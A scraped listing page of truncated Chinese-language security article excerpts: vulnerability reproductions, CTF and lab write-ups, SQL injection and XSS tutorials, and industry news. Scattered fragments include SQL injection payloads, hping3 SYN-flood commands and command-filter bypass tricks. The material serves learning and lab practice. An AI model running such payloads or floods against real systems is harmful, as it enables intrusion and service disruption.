文章目录移动路由器Cellular Router命令执行漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议移动路由器Cellular Router命令执行漏洞复现 [附POC] 0x01 前言免责声明：请勿利用文章…

python练习(猜数字，99乘法表)

python练习(猜数字，99乘法表) 猜数字 import random num1random.choice(range(1,101))for i in range(11):num2input("plz input a number:")num2int(num2)if num1<num2:print("太大了，小一点")elif num1>num2:print("…

内网收集哈希传递

1.内网收集的前提获得一个主机权限补丁提权可以使用 systeminfo 然后使用python脚本找到缺少的补丁下载下来让后使用exp提权收集信息路由信息补丁接口 dns域看一看是不是域控扫描别的端口看看有没有内在的web网站哈希传递哈希是啥哈希…

CTF网络安全题目个人导航【持续更新】

CTF-WEB导航 WEBSQLRCE反序列化文件上传SSTIXXE综合 WEB SQL [SWPUCTF 2021 新生赛]sql - 联合注入 [SWPUCTF 2021 新生赛]easy_sql - 联合注入||报错注入||sqlmap [NSSRound#1 Basic]sql_by_sql - 二次注入布尔盲注||sqlmap [NISACTF 2022]join-us - 报错注入&无列名注入…

nmap指纹识别要点以及又快又准之方法

nmap指纹识别要点以及又快又准之方法一. 前言：二. nmap识别实验：一. 实验一：IP配置：空间配置：扫描结果：详细输出二. 实验二：IP配置：空间配置：扫描结果：详细输出三. 实验三：IP配置：空间配置：扫描结果：详细输出四. 实验四：IP

Jorani远程命令执行漏洞 CVE-2023-26469

Jorani远程命令执行漏洞 CVE-2023-26469 漏洞描述漏洞影响漏洞危害网络测绘Fofa: title"Jorani"Hunter: web.title"Jorani" 漏洞复现1. 获取cookie2. 构造poc3. 执行命令漏洞描述 Jorani是一款开源的员工考勤和休假管理系统，适用于中小型企业…

什么是云安全？

关于云技术有一些模棱两可的术语，因此值得花一些时间来定义一些常见术语。当我们谈论“云”、“云服务”或“云计算”时，我们的意思是： “一种按需、大规模可扩展的服务，托管在共享基础设施上，可通过互联网访问。典型的…

锐捷RG-EW1200G登录绕过漏洞复现

文章目录锐捷RG-EW1200G登录绕过漏洞复现0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.复现 0x06 修复建议锐捷RG-EW1200G登录绕过漏洞复现 0x01 前言免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、…

MSF与CS之间会话传递,互相派生,版本问题踩坑

查看kali版本: ┌──(root㉿kali)-[~] └─# msfconsole -V Framework Version: 6.1.27-dev┌──(root㉿kali)-[~] └─# cat /etc/os-release PRETTY_NAME"Kali GNU/Linux Rolling" NAME"Kali GNU/Linux" IDkali VERSION"2022.1" VERSIO…

低学历能不能学会黑客技术？别再被忽悠了！

学历比较低的人能不能学会黑客技术？龙叔我今年44岁，在IT行业打拼了20多年，今年也是重新转战网络安全，我可以很肯定的告诉你，学历低一样能学会黑客技术!我举几个例子你就明白了。一、上技校的李俊 2007年曾让全国网民…

Linux C/C++下抓包分析mysql流量（协议解析）

MySQL通信协议是一个有状态的协议，主要用于MySQL客户端与服务器之间的通信。这个协议在MySQL客户端连接器（如Connector/C、Connector/J等）、MySQL Proxy以及主从复制中都有实现。该协议的特性包括：支持SSL、压缩和认证等功能。 …

OWASP TOP 10-跨站脚本（XSS）

文章目录漏洞原理漏洞分类存储型XSS反射型XSS面试问题漏洞原理 XSS又叫CSS (Cross Site Script) ，跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达…

Yakit工具篇：中间人攻击(平替Burp)的相关技巧-02

简介前面写了一篇中间人攻击的代理与劫持相关的配置，今天来介绍一下劫持过程相关的详细设置，以及标记/替换流量，History处理，过滤流量，网站树视角等使用技巧和流程。劫持的详细解释劫持界面开始劫持前我们先对…

ObRegisterCallbacks()返回0xC0000022（拒绝访问）解决办法

在开发测试环境下，没有打签名的驱动调用ObRegisterCallbacks会返回0xC0000022（拒绝访问）的错误码。这是由于该函数内部会进行驱动的签名校验。具体位置在因此可以用以下代码绕过该检查 // 以下代码放在DriverEntry中 ULONG_PTR pDrvSectio…

漏洞复现-phpmyadmin_SQL注入（CVE-2020-5504）

phpmyadmin SQL注入 _（CVE-2020-5504） 漏洞信息 CVE-2020-5504sql注入漏洞Phpmyadmin 5.00以下描述 phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库，创建、删除、修改数据库表&…

vulnhub_DeRPnStiNK靶机渗透测试

VulnHub2018_DeRPnStiNK靶机 https://www.vulnhub.com/entry/derpnstink-1,221/ flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6) flag4(49dca65f362fee401292ed7ada96f9…

【华为HCIP | 职业认证考试】821每日一刷

个人名片： 🐼作者简介：一名大三在校生，喜欢编程🎋 🐻‍❄️个人主页🥇：落798. 🐼个人WeChat：hmmwx53 🕊️系列专栏：🖼️ 零…

黑客技术（网络安全）—高效自学

前言前几天发布了一篇网络安全（黑客）自学没想到收到了许多人的私信想要学习网安黑客技术！却不知道从哪里开始学起！怎么学今天给大家分享一下，很多人上来就说想学习黑客，但是连方向都没搞清楚就开始学习…

xss学习笔记

跨站脚本攻击掌握XSS 的原理掌握XSS 的场景掌握XSS 的危害掌握XSS 漏洞验证掌握XSS 的分类跨站脚本攻击漏洞概述跨站点脚本（Cross Site Scripting， XSS）是指客户端代码注入攻击，攻击者可以在合法网站或Web 应用程…

BUUCTF 爱因斯坦 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 下载附件，解压得到一张.jpg图片。密文： 解题思路： 1、因为题目没有什么提示，我们就一一尝试。将图片放到StegSolve中，在查看图片的File Format时&#x…

sqli-labs靶场详解(less11-less16)

目录 less-11 less-12 less-13 less-14 less-15 less-16 提交参数后动态参数不存在url中存在于post表单中于是在表单中进行注入点测试先看一看这种提交数据的关卡输入提交后会有什么反应 unameadmin&passwdadmin&submitSubmit 输出 usernameadmin passwordadmin un…

蚁剑低版本反制

蚁剑低版本反制漏洞概述中国蚁剑是一款开源的跨平台网站管理工具，它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。影响范围 AntSword <2.0.7 蚁剑实验版本：2.0.7 环境搭建： 172.16.1.233（蓝队服…

基于隐马尔可夫模型的一种流水印

文章信息论文题目：An Invisible Flow Watermarking for Traffic Tracking: A Hidden Markov Model Approach 期刊（会议）：ICC 2019 - 2019 IEEE International Conference on Communications (ICC) 时间：2019 级别&am…

jekins CVE-2018-1000861 漏洞复现

jekins CVE-2018-1000861 漏洞复现 ‍ 名称: jenkins 命令执行 （CVE-2018-1000861） 描述: Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。插件通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交付工具…

什么是计算机病毒？

计算机病毒 1. 定义2. 计算机病毒的特点3. 计算机病毒的常见类型和攻击方式4. 如何防御计算机病毒 1. 定义计算机病毒是计算机程序编制者在计算机程序中插入的破坏计算机功能或者破坏数据，影响计算机使用并且能够自我复制的一组计算机指令或程序代码。因其特点与生…

【华为数通HCIP | 网络工程师】821刷题日记-BFD和VRRP 及重点（2）

个人名片： 🐼作者简介：一名大三在校生，喜欢AI编程🎋 🐻‍❄️个人主页🥇：落798. 🐼个人WeChat：hmmwx53 🕊️系列专栏：🖼️…

HackTheBox靶场系列(一)之HackTheBox靶场简介

前言 Hack The Box是国外的一个网络安全在线平台，允许用户实践渗透测试技能，并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战，其中有许多模拟真实场景的机器。 HackTheBox靶场介绍 HackTheBox靶场是一个虚拟的渗透测试训…

2023网络安全产业图谱

1. 前言 2023年7月10日，嘶吼安全产业研究院联合国家网络安全产业园区（通州园）正式发布《嘶吼2023网络安全产业图谱》。嘶吼安全产业研究院根据当前网络安全发展规划与趋势发布《嘶吼2023网络安全产业图谱》调研，旨在进一步了解…

Positive Technologies 公司发布了一种保护容器环境的产品 PT Container Security

根据 Positive Technologies 公司的数据，该类产品在俄罗斯的市场容量为 25 亿卢布，据预测，到 2026 年将增长两倍 Positive Technologies 公司正在增加应用安全方面的产品组合。新产品 PT Container Security可在构建、部署和工业运行阶段自动…

【CVE-2023-49103】ownCloud graphapi信息泄露漏洞（2023年11月发布）

漏洞简介 ownCloud owncloud/graphapi 0.2.x在0.2.1之前和0.3.x在0.3.1之前存在漏洞。graphapi应用程序依赖于提供URL的第三方GetPhpInfo.php库。当访问此URL时，会显示PHP环境的配置详细信息（phpinfo）。此信息包括Web服务器的所有环境变量&a…

telnet的交互原理（wireshark分析）

telnet的交互原理（wireshark篇） telnet的协议类型是tcp，他的密钥用的是明文的，容易被捕获，所以后来的windows基本弃用了telnet服务端但依然保留了客户端。下面是他的交互抓包： 这里面的前三条运用的是tc…

（CVE-2019-9193）PostgreSQL 高权限命令执行漏洞的复现

漏洞概述 PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。影响版本 9.3-11.2 环境搭建 1. 本次漏洞环境使用vulhub中…

【JavaFX漏扫开发基础】JavaFx项目基础

文章目录前言一、创建项目二、运行程序三、application的启动方式和生命周期四、生命周期前言创建第一个javafx项目，用Idea编辑器来创建。提示：以下是本篇文章正文内容，下面案例可供参考一、创建项目初创项目，第一个javafx的窗口。依次点击，新建项目点击Jaca…

【Windbg】学习及在CTF中解题

1、Windbg介绍 Windbg是一款Windows强大的调试器，可以调试0和3环的程序。在实际开发中，可以调试我们的错误程序，从而定位关键代码，进行程序代码修复。 WinDbg 是一种调试器工具，由微软公司开发，用于分析…

sqli-labs靶场详解(less38-less45)

堆叠注入 less-38 less-38 ?id1 and 11;%00 成功 ?id1 and 12;%00 失败不是吧这就出来了？ ?id1 order by 4;%00 报错 4列不行 ?id0 union select 1,2,3;%00 显示位置为2,3 ?id0 union select 1,database(),3;%00 数据库为security ?id0 union select 1,…

$服务器解析漏洞有哪些？IIS\APACHE\NGINX解析漏洞利用$

服务器解析漏洞有哪些？IIS\APACHE\NGINX解析漏洞利用

解析漏洞是指在Web服务器处理用户请求时，对输入数据（如文件名、参数等）进行解析时产生的漏洞。这种漏洞可能导致服务器对用户提供的数据进行错误解析，使攻击者能够执行未经授权的操作。解析漏洞通常涉及到对用户输入的信任不足&am…

ctfshow(web171-web189)

目录 web171 web172 web173 web174 web175 web176 web177 web178 web179 web180 web181 web182 web183 web184 web185 web186 web187 web188 web189 web171 1 and 11 有结果 1 and 12 无结果字符型注入点 1 order by 3 -- 正常 1 order by 4 -- 报错0 unio…

CVE-2023-25573：MeterSphere 任意文件下载漏洞复现[附POC]

文章目录 MeterSphere 任意文件下载（CVE-2023-25573）漏洞复现[附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 MeterSphere 任意文件下载（CVE-2023-25573）漏洞…

前端漏洞--front（系统有user1/user1，admin1/admin1两个用户）

任务一：挖掘反射型XSS漏洞（以弹窗test13）证明任务二：复现环境中的CSRF漏洞，设计表单，当管理员点击URL后自动将自己密码重置为：123456 任务三：复现环境中的JSON Hijacking漏洞&#…

2024年网络安全行业前景和技术自学

很多人不知道网络安全发展前景好吗？学习网络安全能做什么？今天为大家解答下先说结论，网络安全的前景必然是超级好的作为一个有丰富Web安全攻防、渗透领域老工程师，之前也写了不少网络安全技术相关的文章，不少读者朋…

【漏洞复现】狮子鱼任意文件上传漏洞

漏洞描述狮子鱼CMS（Content Management System）是一种网站管理系统，旨在帮助用户更轻松地创建和管理网站。它具有用户友好的界面和丰富的功能，包括页面管理、博客、新闻、产品展示等。狮子鱼CMS使用简单直观的管理界面，使得网站所有者可以方便地进行内容的发布、管理和…

Yakit工具篇：WebFuzzer模块之序列操作

简介 Web Fuzzer 序列就是将多个 Web Fuzzer 节点串联起来，实现更复杂的逻辑与功能。例如我们需要先进行登录，然后再进行其他操作，这时候我们就可以使用 Web Fuzzer 序列功能。或者是我们在一次渗透测试中需要好几个步骤才能验证是否有漏洞这…

【漏洞复现】CVE-2023-6895 IP网络对讲广播系统远程命令执行

漏洞描述杭州海康威视数字技术有限公司IP网络对讲广播系统。海康威视对讲广播系统3.0.3_20201113_RELEASE(HIK)存在漏洞。它已被宣布为关键。该漏洞影响文件/php/ping.php 的未知代码。使用输入 netstat -ano 操作参数 jsondata[ip] 会导致 os 命令注入。开发语言：PHP 开…

反序列化漏洞详解(二)

目录 pop链前置知识，魔术方法触发规则 pop构造链解释（开始烧脑了） 字符串逃逸基础字符减少字符串逃逸基础字符增加实例获取flag 字符串增多逃逸字符串减少逃逸延续反序列化漏洞(一)的内容 pop链前置知识，魔术方法触…

打CTF比赛/HVV挖洞需要了解哪些知识？

参加CTF（Capture The Flag）比赛或参与漏洞赏金猎人（HVV, HackerOne Vulnerability Hunter）活动需要以下关键知识： 1. 网络和系统安全： 理解TCP/IP、DNS、HTTP等网络协议。掌握操作系统安全&#x…

漏洞复现--云时空商业ERP文件上传

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

压缩包文件暴力破解 -Server2005（解析）

任务五十一：压缩包文件暴力破解任务环境说明：Server2005 1. 通过本地PC中渗透测试平台Kali使用Nmap扫描目标靶机服务版本信息，将 Telnet 版本信息字符串作为 Flag 提交; flag:Microsoft Windows XP telnetd 2. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测…

sql注入如何绕过waf，SQL注入绕过技巧分享（黑客自学）

SQL注入（SQL Injection）是一种利用应用程序对用户输入的不当处理而导致的安全漏洞。攻击者通过在用户输入中注入恶意的SQL代码，成功执行数据库查询，甚至执行未经授权的数据库操作。 SQL注入绕过技巧是攻击者用来规避应用程序对注…

Microsoft发布了一份关于其产品安全修复的 11 月报告。

👾 平均每天有 50 多个漏洞被发现，其中一些会立即被网络犯罪分子利用。我们把那些现在很受网络犯罪分子欢迎，或者根据我们的预测，在不久的将来可能会被大量利用的漏洞称为趋势漏洞。在攻击者开始利用这些漏洞之前 12 小时&#…

网络安全入门教程（非常详细）从零基础入门到精通

网络安全是一个庞大而不断发展的领域，它包含多个专业领域，如网络防御、网络攻击、数据加密等。介绍网络安全的基本概念、技术和工具，逐步深入，帮助您成为一名合格的网络安全从业人员。一、网络安全基础知识 1.计算机基础知识了解…

内网安全—Windows系统内核溢出漏洞提权

系统内核溢出漏洞提权往缓冲区中写入超出限定长度的内容，造成缓冲区溢出，从而破坏程序的堆栈进而运行自己精心准备的指定代码，达到攻击的目的。分类： 堆溢出栈溢出查找补丁的方法 1、手工查找补丁情况 systeminfo Wmic qfe…

速盾网络：业务卓越，数字安全的领先者

在数字时代的浪潮中，业务成功需要强大的数字基石。速盾网络以其出色的CDN加速、高防IP、SDK游戏盾和抗DDoS攻击等业务，成为业界领先的数字安全保障者，为您的业务提供全方位的支持与保护。 CDN加速：业务飞跃的翅膀速盾网络以全球…

网络安全试题——附答案

选择题示例： 在网络安全中，什么是“DDoS”攻击的全称？ a) Distributed Denial of Service b) Data Destruction of Service c) Direct Denial of Security d) Digital Defense of Servers 使用什么类型的加密可以确保在互联网上传输的数据是…

JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504 已亲自复现

JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504 已亲自复现漏洞名称影响版本影响版本漏洞复现环境搭建漏洞利用漏洞利用总结漏洞名称影响版本 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中，JbossMQ实现…

DC-5靶场

目录 DC-5靶机： 先进行主机发现： 发现文件包含： 上传一句话木马： 反弹shell： 提权漏洞利用： 下载exp： 第一个文件 libhax.c 第二个文件r…

漏洞复现--Smartbi smartbivisionRMIServlet 接口权限绕过漏洞

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

[NISACTF 2022]easyssrf

[NISACTF 2022]easyssrf wp ssrf 的题目，提示了会使用 curl 连接输入的网站并返回响应包。测试连接百度直接在输入框中写 www.baidu.com 是无法连接的，需要在前面加入 http 或者 https ，因为 curl 的使用方式就是： curl htt…

网络安全行业术语

病毒是在计算机程序中插入的破坏计算机功能或者数据的代码，能影响计算机使用，能自我复制的一组计算机指令或者程序代码。抓鸡利用使用大量的程序的漏洞，使用自动化方式获取肉鸡的行为，即设法控制电脑，将其沦为肉…

网络安全-WAF如何判断是攻击行为

WAF概念 WAF(Web Application Firewall)可以用来屏蔽常见的网站漏洞攻击，如SQL注入，XML注入、XSS等。WAF针对的是应用层而非网络层的入侵，从技术角度应该称之为Web IPS. WAF种类 1、非嵌入型WAF 对Web流量的解析完全是靠自身的，…

【ACM独立出版、确定的ISBN号】第三届密码学、网络安全和通信技术国际会议（CNSCT 2024）

第三届密码学、网络安全和通信技术国际会议（CNSCT 2024） 2024 3rd International Conference on Cryptography, Network Security and Communication Technology 随着互联网和网络应用的不断发展，网络安全在计算机科学中的地位越来越重要&…

掌控安全 -- header注入

http header注入该注入是指利用后端验证客户端口信息（比如常用的cookie验证）或者通过http header中获取客户端的一些信息（比如useragent用户代理等其他http header字段信息），因为这些信息是会重新返回拼接到后台中的&…

Linux 5.15安全特性之ARM64 PAC

ARM64 PAC（Pointer Authentication Code）机制是ARM架构中引入的一种安全特性，旨在提供指针的完整性和安全性保护。它通过在指针中插入一段额外的代码进行签名，以验证指针的完整性，从而抵御缓冲区溢出和代码注入等攻击。…

西工大计算机学院计算机系统基础实验一（环境配置）

首先，不要焦虑，稳住心态慢慢来，一点一点做，跟着作者把基础打好，比什么都重要。作者曾经经历过这份痛苦，知道它有多么不好受。当初的作者高中之前甚至都没有自己的一台笔记本，上了大学以后学C语言…

IT外包服务融合云计算：企业信息化发展的新阶段

IT外包服务和云计算是企业在发展过程中重点关注的对象，它们在不同的方面为企业的信息化建设提供有力的支持。而两者的融合与发展更是为企业带来了巨大的机遇和挑战。 IT外包服务与云计算的融合为企业带来的机遇首先，IT外包服务与云计算的融合使企业能够…

【漏洞复现】万户协同办公平台ezoffice wpsservlet接口存在任意文件上传漏洞附POC

漏洞描述万户ezOFFICE集团版协同平台以工作流程、知识管理、沟通交流和辅助办公四大核心应用万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户协同办公平台ezoffice wpsservlet接口存在任意文件上传漏洞。免责声明技术文章仅供参考，任何个人和组织使用网络应…

【2023年网络安全优秀创新成果大赛专刊】银行数据安全解决方案（天空卫士）

在2023年网络安全优秀创新成果大赛，成都分站中，天空卫士银行数据安全方案获得优秀解决方案奖。与此同时，天空卫士受信息安全杂志邀请，编写《银行数据安全解决方案》。12月6日，天空卫士编写的《银行数据安全解决方案》做…

Mimikatz 的使用（黄金票据的制作）

#江南的江 #每日鸡汤：孤独没有什么反义词，但他的近义词是自由，人生成功的道路上充满了孤独，那么也同样告诉你，你离成功后的自由不远了。 #初心和目标：在网络安全里高出名堂。。。 Mimikatz 本文分为两种…

使用Mosquitto/python3进行MQTT连接

一、简介 MQTT(消息队列遥测传输)是ISO 标准(ISO/IEC PRF 20922)下基于发布/订阅范式的消息协议。它工作在 TCP/IP协议族上，是为硬件性能低下的远程设备以及网络状况糟糕的情况下而设计的发布/订阅型消息协议，为此，它需要一个消息中间件。 …

孩子还是有一颗网安梦——Bandit通关教程：Level 17 → Level 18

🕵️‍♂️ 专栏《解密游戏-Bandit》 🌐 游戏官网： Bandit游戏 🎮 游戏简介： Bandit游戏专为网络安全初学者设计，通过一系列级别挑战玩家，从Level0开始，逐步学习基础命令行和安全概念…

Apache Struts 代码执行漏洞风险通告

最近，亚信安全CERT通过监控发现，Apache官方披露了Apache Struts 代码执行漏洞（CVE-2023-50164）。攻击者可以利用文件上传参数进行路径遍历，并在某些情况下上传恶意文件，从而执行任意代码。 Apache Struts 是…

文件包含漏洞概述、特征、利用条件、危害、防御

文章目录 1. 漏洞概述2. 特征3. 利用条件4. 危害5. 防御措施案例网安学习路线 1. 漏洞概述文件包含漏洞允许攻击者将外部文件注入到Web应用程序中。这通常发生在应用程序使用用户提供的输入来动态包含文件时，如配置脚本、语言本地化文件或用户数据。例如&#xff…

2019QWB growpjs

第一次知道原来各种map也是申请的一段连续的内存空间来存储，所以必要的时候可以通过固定偏移来从一种map获取到另一种map。但是要注意这里的获取的时候要保证对象不被释放。这也是做的第一道涉及优化器的题目，收货很多 class Memory{constructor(){th…

任意文件下载漏洞概述、复现、利用、危害、修复方案

概述任意文件下载是一种允许攻击者从目标服务器下载任意文件的攻击类型。这可能导致严重的安全漏洞，例如泄露敏感信息、获取对服务器的未经授权的访问，甚至完全控制服务器。复现攻击者可以使用多种技术来执行任意文件下载，包括&#x…

泛微移动管理平台E-mobile lang2sql接口任意文件上传漏洞

一、漏洞描述泛微e-mobile,由高端OA泛微专业研发,是业内领先的移动OA系统,提供移动审批,移动考勤,移动报表,企业微信等丰富办公应用,支持多种平台运行,灵活易用安全性高。 e-mobile可满足企业日常管理中的绝大部分管理需求， 诸如市场销售、项目、采购、研发、客服…

Google警告黑客如何滥用日历服务作为隐蔽的C2信道

导语最近，谷歌发布了一份关于黑客如何滥用日历服务作为隐蔽的C2信道的警告。这种新型攻击方式利用了谷歌日历作为C2基础设施，给安全防御带来了新的挑战。本文将介绍这种攻击方式的细节，以及如何防范这一威胁。 Google Calendar RAT&#xff…

记一次经典SQL双写绕过题目[极客大挑战 2019]BabySQL 1

题目环境： 作者已经描述进行了严格的过滤做好心理准备进行迎接判断注入类型 admin 1’ 字符型注入万能密码注入 admin 1’ or ‘1’1 报错已经是字符型注入了，所以的话只有or这里存在了过滤联想到buuctf里面还没有碰到双写绕过的题目所以这里斗胆试…

远程文件包含演示

远程文件包含基本介绍受害机器 10.9.47.181 攻击者机器1 10.9.47.41 攻击者机器2 10.9.47.217 实现过程受害者机器开启phpstudy 并且开启允许远程连接攻击者机器1上有一个文件，内容是phpinfo(); 攻击者机器1提供web服务使得受害者机器能够访问到攻击者…

如何判断被DDoS攻击

当网络和设备正常的情况下，服务器突然出现连接断开、访问卡顿、用户掉线等情况;服务器CPU或内存占用率出现明显增长;网络出入流量出现明显增长;网站或应用程序突然出现大量的未知访问;登录服务器失败或者登录过慢等等。以上是最为常见的服务器被 DDoS攻击后出现的几…

malicious software

恶意软件，如幽灵在夜空中舞动，其形态和节奏随着时间的流转不断变化。它悄然演化，犹如秋天的叶子，逐渐改变其色彩，从一种伪装转变为另一种，以适应不断变化的数字世界。它们的行为，像是潮水&#…

Facebook广告账户限制原因？一文带你避雷

很多小伙伴在facebook开启企业号进行投放广告，经常会出现广告投放被限制，不能创建广告或者更新一些设置被限制不仅业务受到阻碍，影响进度，造成损失，更有可能会失去一个广告账户。那么被限制的原因会有哪些&#xff0…

【漏洞复现】BYTEVALUE智能流控路由器存在命令执行

【漏洞介绍】百为智能流控路由器 /goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令，写入后门，获取服务器权限，从而获取路由器权限。【指纹】 title”BYTEVALUE 智能流控路由器”…

HCIP---OSPF思维导图

缅因州政府通知130万人MOVEit数据泄露事件

大家好，今天我要向大家通报一个令人震惊的消息：缅因州政府的系统遭到了入侵，黑客利用MOVEit文件传输工具的漏洞，获取了约130万人的个人信息，这几乎相当于该州的整个人口数量。 MOVEit攻击是Clop勒索软件团伙进行的一次…

网站被反诈拦截该怎么申诉与解封

随着互联网的发展，网络诈骗问题也日益突出。为了打击这类问题，反诈中心采取了一系列的措施，如打击违规诈骗网站和APP，标记诈骗手机号等。虽然这些措施在一定程度上取得了效果，但是也不可避免会出现审核不到位的情况。 …

反序列化漏洞介绍

反序列化漏洞序列化和反序列化本身不存在漏洞，之所以会有反序列化漏洞，是因为开发者在编写时，加入了一些恶意的代码 PHP反序列化漏洞是一种安全漏洞，它允许攻击者利用未经验证的用户输入来执行恶意代码。这种漏洞通常出现在PHP…

Crypto | Affine password 第二届“奇安信”杯网络安全技能竞赛

题目描述： 明文经过仿射函数y3x9加密之后变为JYYHWVPIDCOZ，请对其进行解密，flag的格式为flag{明文的大写形式}。密文： JYYHWVPIDCOZ解题思路： 1、使用在线网站直接破解或手工计算破解，获得flag。&#xf…

【科研新手指南2】「NLP+网安」相关顶级会议期刊投稿注意事项+会议等级+DDL+提交格式

「NLP网安」相关顶级会议&期刊投稿注意事项写在最前面一、会议ACL (The Annual Meeting of the Association for Computational Linguistics)IH&MMSec (The ACM Workshop on Information Hiding, Multimedia and Security)CCS (The ACM Conference on Computer and Co…

8Base集团通过SmokeLoader部署新的Phobos勒索软件变种

最近，8Base集团的威胁行为者通过Phobos勒索软件的变种展开了一系列金融动机的攻击。这一发现来自于思科Talos的研究结果，他们记录了网络犯罪分子活动的增加。安全研究员Guilherme Venere在周五发表的详尽的两部分分析中表示：“该组织的大多…

简单php反序列化实现执行代码

简单php反序列化实现执行代码反序列化举例首先定义类和对象，然后输出序列化和反序列化结果看看这是个什么东西 <?phpclass Stu{public $name;public $age;public $sex;public $score;}$stu1 new Stu();$stu1->name "order";$stu1->age …

断点检测学习

突然看到了一种反调试的手段，检测api函数的首字节是否为0xcc，即int 3类型的断点，来反调试，尝试一下 #include<stdio.h> #include<stdlib.h> void fun(int a) {a;a--;a 5;a - 5;return; } int main() {void (*ptr)(i…

使用hping3和wrk模拟泛洪

一、hping3 1、syn随机ip泛洪 hping3 --flood -S --rand-source -p 端口目标ip hping3 -c 10000 -d 120 -S -p 80 --flood --rand-source 192.168.112.130说明： -c 100000 packets 发送的数量 -d 120 packet的大小 -S 只发送syn packets -p 80 目标端口&am…

pwn：[SWPUCTF 2021 新生赛]nc签到

题目 linux环境下显示为配合题目的下载附件，发现过滤了一些，一旦输入这些会自动关闭程序 ls被过滤了，可以使用l\s cat和空格都被过滤了，cat可以换成c\at ,空格可以换成$IFS$9

网络安全（黑客技术）---0基础自学

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

cobalt_strike_4.7启动报错.teamserver: 行 6: .TeamServerImage: 权限不够(解决方法)

cobalt_strike_4.7启动报错.teamserver: 行 6: .TeamServerImage: 权限不够(解决方法) 是TeamServerImage文件没有执行权限，不是teamserver这个文件。哎~

企业IT安全：内部威胁检测和缓解

什么是内部威胁内部威胁是指由组织内部的某个人造成的威胁，他们可能会造成损害或窃取数据以谋取自己的经济利益，造成这种威胁的主要原因是心怀不满的员工。任何内部人员，无论是员工、前雇员、承包商、第三方供应商还是业务合作伙伴&#…

代码执行相关函数以及简单例题

代码/命令执行系列相关函数 （代码注入）

【网安 | 网络协议】ARP协议（地址解析协议）

前言在使用nmap时可以使用-PR指令，通过发送ARP请求包进行主机存活探测。那么这一过程的原理是什么呢？ 在了解什么是ARP协议后，问题就迎刃而解了。概念地址解析协议，即ARP（Address Resolution Protocol&#xf…

2023年中职“网络安全“—Linux系统渗透提权③

2023年中职"网络安全"—Linux系统渗透提权③ Linux系统渗透提权任务环境说明：1. 使用渗透机对服务器信息收集，并将服务器中SSH服务端口号作为flag提交；2. 使用渗透机对服务器信息收集，并将服务器中主机名称作为flag提交…

BUUCTF [GXYCTF2019]佛系青年 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 密文： 下载附件，解压得到ZIP压缩包。解题思路： 1、压缩包内有一张png图片和一个txt文本，解压zip压缩包，解压出图片，但txt文本提示需要输入密…

使用HTTP协议有哪些风险？HTTP与HTTPS的区别是什么

作为两种常见的网络协议，HTTP和HTTPS都是用于在浏览器和服务器之间传输数据的。然而在保障数据安全性方面，HTTPS远远优于HTTP。在网络安全愈发重要的当下，HTTP协议的不安全性使得其逐渐被淘汰弃用。那么使用HTTP协议有哪些风险呢？…

【数据结构】五、数组与广义表

目录一、定义二、计算数组元素地址三、稀疏矩阵快速转置稀疏矩阵的表示稀疏矩阵快速转置四、广义表一、定义我们所熟知的一维、二维数组的元素是原子类型。广义表中的元素除了原子类型还可以是另一个线性表。当然所有的数据元素仍然属于同一类型。这里的数组可…

IPv6路由基础-理论与配置

在企业网络中，IPv6技术的应用越来越普及。IETF组织针对IPv6网络制定了路由协议OSPFv3。 OSPFv3 ff02::5是为OSPFv3路由协议预留的IPv6组播地址。OSPFv3中的路由条目下一跳地址是链路本地地址。OSPFv3是运行在IPv6网络的OSPF协议。运行OSPFv3的路由器使用物理接口的…

【一分钟】ThinkPHP v6.0 （poc-yaml-thinkphp-v6-file-write）环境复现及poc解析

写在前面一分钟表示是非常短的文章，只会做简单的描述。旨在用较短的时间获取有用的信息环境下载官方环境下载器：https://getcomposer.org/Composer-Setup.exe 下载文档时可以设置代理，不然下载不上，你懂的下载成功 cmd cd…

Kioptrix-2

环境搭建这个靶场环境稍微有点麻烦，首次打开的时候，需要将靶机从VM中移除（注意是从VM里面移除），然后利用nodpad等工具打开vmx文件，然后两步： 所有以“ethernet0”开头的条目并保存更改。然后…

信息收集 - 谷歌hack

